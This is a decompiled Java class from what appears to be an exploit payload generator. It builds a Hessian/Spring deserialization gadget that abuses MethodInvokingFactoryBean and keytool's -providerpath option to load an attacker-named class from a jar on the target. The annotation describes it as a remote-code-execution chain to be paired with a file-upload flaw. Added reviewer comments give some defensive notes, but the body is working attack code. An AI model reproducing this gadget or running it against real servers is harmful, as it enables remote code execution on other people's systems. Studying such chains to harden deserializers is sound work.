package com.ar3h.chains.gadget.impl.hessian.spring.ext;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.Reflections;
import oracle.security.pki.resources.OraclePKICmd;
import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
import sun.security.tools.keytool.Main;

/**
 * Payload-generator gadget (decompiled from chains-core) that builds a Spring
 * {@link MethodInvokingFactoryBean} whose prepared method is the static
 * {@code main} of {@code sun.security.tools.keytool.Main}.
 *
 * <p>English rendering of the annotation text below: "Load a jar on the target and
 * call arbitrary functions. Uses MethodInvokingFactoryBean to call an arbitrary
 * method; this chain calls sun.security.tools.keytool.Main to load a class from a
 * jar that is local to the target. It has to be combined with a file-upload
 * weakness (the SpringUpload chain) to reach code execution."
 *
 * <p>Reviewer notes for defenders, based only on what this class shows:
 * <ul>
 *   <li>The chain is tagged {@code Tag.HessianSpringChains}, so the object is meant
 *       to be delivered through Hessian deserialization in an application that has
 *       {@code spring-context} on its classpath. Refusing untrusted Hessian input,
 *       or restricting the deserializer to an allowlist of expected types, removes
 *       the entry point.</li>
 *   <li>The argument list passes {@code -providerpath} with a jar path and a provider
 *       class name to keytool. A server JVM running keytool's entry point in-process,
 *       with a provider path outside the JDK, is unusual and worth alerting on.</li>
 *   <li>By the annotation's own description the jar must already exist on the target,
 *       so upload directories that are writable from the network are the second
 *       precondition to close.</li>
 * </ul>
 */
@GadgetAnnotation(name = "加载目标的jar包进行任意函数调用", description = "通过 org.springframework.beans.factory.config.MethodInvokingFactoryBean 实现调用任意方法\n本链调用 sun.security.tools.keytool.Main 实现加载目标本地jar包的某个类\n需要配合文件上传漏洞(SpringUpload链)实现RCE", dependencies = {"org.springframework:spring-context"})
@GadgetTags(tags = {Tag.HessianSpringChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/spring/ext/SpringLoadJar.class */
public class SpringLoadJar extends SpringLinuxExec {

    // Operator-supplied parameter; the description reads "path of the jar in the target
    // environment". Defaults to the relative path "1.jar".
    @Param(name = "filepath", description = "目标环境的jar路径")
    public String filepath = "1.jar";

    // Operator-supplied parameter; the description reads "object to initialise, the
    // no-argument constructor is called by default". No default is declared here, so the
    // field is null unless a value is supplied.
    @Param(name = "evilClass", description = "需要初始化的对象，默认调用无参构造函数")
    public String evilClass;

    /**
     * Builds the factory bean that the chain carries.
     *
     * @return a non-singleton {@link MethodInvokingFactoryBean} whose {@code methodObject}
     *         field points at keytool's {@code main(String[])} and whose arguments name
     *         {@link #evilClass} as provider and {@link #filepath} as provider path
     * @throws Exception if the reflective method lookup or the field writes fail
     */
    @Override // com.ar3h.chains.gadget.impl.hessian.spring.ext.SpringLinuxExec
    public Object makeBean() throws Exception {
        MethodInvokingFactoryBean methodInvokingFactoryBean = new MethodInvokingFactoryBean();
        methodInvokingFactoryBean.setSingleton(false);
        // A target object is set through the public setter, but the method that will be
        // invoked is written straight into the private "methodObject" field below.
        // NOTE(review): main is static, so the Runtime instance looks unused - confirm.
        methodInvokingFactoryBean.setTargetObject(Runtime.getRuntime());
        Reflections.setFieldValue(methodInvokingFactoryBean, "methodObject", Main.class.getMethod("main", String[].class));
        // The bean's class loader reference is cleared by reflection; the reason is not
        // visible in this file.
        Reflections.setFieldValue(methodInvokingFactoryBean, "beanClassLoader", null);
        // keytool command line: list mode, with a provider class and a provider path.
        // NOTE(review): OraclePKICmd.bb looks like a constant substituted by the
        // decompiler; its value is not visible here, and the reference makes this class
        // depend on the Oracle PKI jar at compile time.
        methodInvokingFactoryBean.setArguments(new String[]{"-LIST", "-provider:", this.evilClass, OraclePKICmd.bb, "NONE", "-protected", "-debug", "-providerpath", this.filepath});
        return methodInvokingFactoryBean;
    }

    /**
     * Chain entry point: records a fixed bean name in the context and returns the object
     * produced by the inherited {@code getObject()}.
     *
     * @param gadgetContext shared context; {@code ContextTag.BEAN_NAME_KEY} is set to
     *                      {@code "beanName123"}
     * @param gadgetChain   not used in this override
     * @return whatever the inherited {@code getObject()} returns (defined in a superclass
     *         that is not part of this file)
     * @throws Exception propagated from {@code getObject()}
     */
    @Override // com.ar3h.chains.gadget.impl.hessian.spring.ext.SpringLinuxExec, com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.put(ContextTag.BEAN_NAME_KEY, "beanName123");
        return getObject();
    }
}
